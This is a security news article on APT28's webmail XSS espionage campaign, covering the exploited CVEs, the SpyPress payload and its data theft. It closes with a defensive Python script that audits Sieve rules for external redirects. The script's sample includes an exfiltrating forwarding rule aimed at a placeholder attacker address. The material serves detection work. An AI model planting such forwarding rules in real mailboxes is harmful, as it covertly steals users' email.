APT28 Webmail XSS Attacks Expose Global Email Networks


A Russia-linked threat actor, known as APT28, has been attributed to a cyber espionage campaign targeting webmail servers through cross-site scripting (XSS) vulnerabilities, including a zero-day in MDaemon, according to new findings by cybersecurity firm ESET.

The campaign, dubbed Operation RoundPress, began in 2023 and targets widely used webmail platforms like Roundcube, Horde, MDaemon, and Zimbra. ESET links the operation with medium confidence to APT28—a group known by many aliases including Fancy Bear, Sednit, Forest Blizzard, and TA422.

“The ultimate goal is to steal confidential data from specific email accounts,” said ESET researcher Matthieu Faou. While most of the 2024 targets have been Ukrainian governmental entities and defense contractors in Bulgaria and Romania, the campaign has also reached organizations in Greece, Serbia, Cyprus, Cameroon, Ecuador, and beyond.

APT28’s Webmail Exploits Include Zero-Day and Known CVEs

The attacks exploit XSS vulnerabilities in multiple email platforms to execute malicious JavaScript code via HTML content embedded in email messages. These flaws allow access to victim inboxes—without persistent malware—so long as the user opens the message through the webmail interface.

Here’s a breakdown of the targeted vulnerabilities:

  • Roundcube: CVE-2023-43770, previously documented and added to CISA’s KEV catalog
  • Zimbra: CVE-2024-27443, known and patched
  • Horde: Exploited via an old flaw patched in 2007
  • MDaemon: Exploited via a zero-day now assigned CVE-2024-11182 (CVSS 5.3), patched in version 24.5.1 (November 2024)

ESET confirmed that APT28 weaponized these vulnerabilities by sending crafted HTML emails containing hidden JavaScript—code not visible to the recipient. Once the email is opened, a payload called SpyPress executes in the background, harvesting:

  • Email credentials
  • Inbox content and contact lists
  • 2FA codes and login history
  • In some cases, new mailbox rules and application passwords

One variant, SpyPress.ROUNDCUBE, creates Sieve rules in Roundcube to automatically forward all incoming emails to an attacker-controlled address—ensuring long-term access even after the malicious email is deleted.

Notably, the malware lacks persistence; it only runs when the email is reopened. Still, ESET warns that its ability to retrigger and re-exfiltrate data makes it an effective and stealthy espionage tool.

Why Webmail Platforms Are Prime Targets

APT28 and other groups such as Winter Vivern and GreenCube (UNC3707) have increasingly focused on webmail platforms over the past two years. These services are often under-maintained, vulnerable to remote HTML-based exploitation, and used by government, military, and academic institutions.

Faou noted, “Many organizations don’t regularly update webmail servers, and because XSS payloads can be delivered via email, it’s very convenient for attackers to use them for targeted espionage and email theft.”

Given the cross-border scope and advanced tactics of APT28 webmail XSS attacks, ESET is urging system administrators to patch vulnerable mail systems, audit custom Sieve rules, and implement enhanced monitoring for suspicious webmail activity.
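As an added illustration of the Sieve audit ESET recommends (example code written for this article, not ESET's or any webmail project's own tooling), the following Python scans a Sieve script for redirect actions whose destination domain is outside an allowlist of internal domains. The sample script, mailbox names and domain names are constructed placeholders.

```python
import re
from typing import Dict, List

# Sieve "redirect" action, optionally carrying the :copy tag (RFC 5228 / RFC 3894).
REDIRECT_RE = re.compile(r'\bredirect\s+(?::copy\s+)?"([^"]+)"', re.IGNORECASE)
# Sieve comments: "# ..." to end of line and "/* ... */" blocks. Stripped before
# matching so a commented-out redirect is not reported (a "#" inside a quoted
# address would also be cut; addresses like that are rare in practice).
COMMENT_RE = re.compile(r"#[^\n]*|/\*.*?\*/", re.DOTALL)


def find_external_redirects(script: str, internal_domains: List[str]) -> List[Dict[str, str]]:
    """Return every redirect target whose domain is not in internal_domains."""
    allowed = {d.lower() for d in internal_domains}
    cleaned = COMMENT_RE.sub("", script)
    findings = []
    for match in REDIRECT_RE.finditer(cleaned):
        target = match.group(1).strip()
        domain = target.rsplit("@", 1)[-1].lower() if "@" in target else ""
        if domain not in allowed:
            findings.append({"target": target, "domain": domain})
    return findings


def audit_user_scripts(scripts: Dict[str, str], internal_domains: List[str]) -> Dict[str, List[Dict[str, str]]]:
    """Map each mailbox to its external redirects; mailboxes with none are omitted."""
    report = {}
    for user, script in scripts.items():
        hits = find_external_redirects(script, internal_domains)
        if hits:
            report[user] = hits
    return report


# Constructed sample: one benign filing rule plus a forwarding rule of the kind
# the article describes. All names are placeholders.
SAMPLE_SCRIPT = """
require ["fileinto", "copy"];
# file partner mail
if address :domain "from" "partner.example" {
    fileinto "Partners";
}
/* copy every message out while leaving the original in the inbox */
redirect :copy "collector@attacker-placeholder.example";
redirect "helpdesk@corp.example";
"""

if __name__ == "__main__":
    for user, hits in audit_user_scripts({"alice": SAMPLE_SCRIPT}, ["corp.example"]).items():
        print(user, hits)
```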
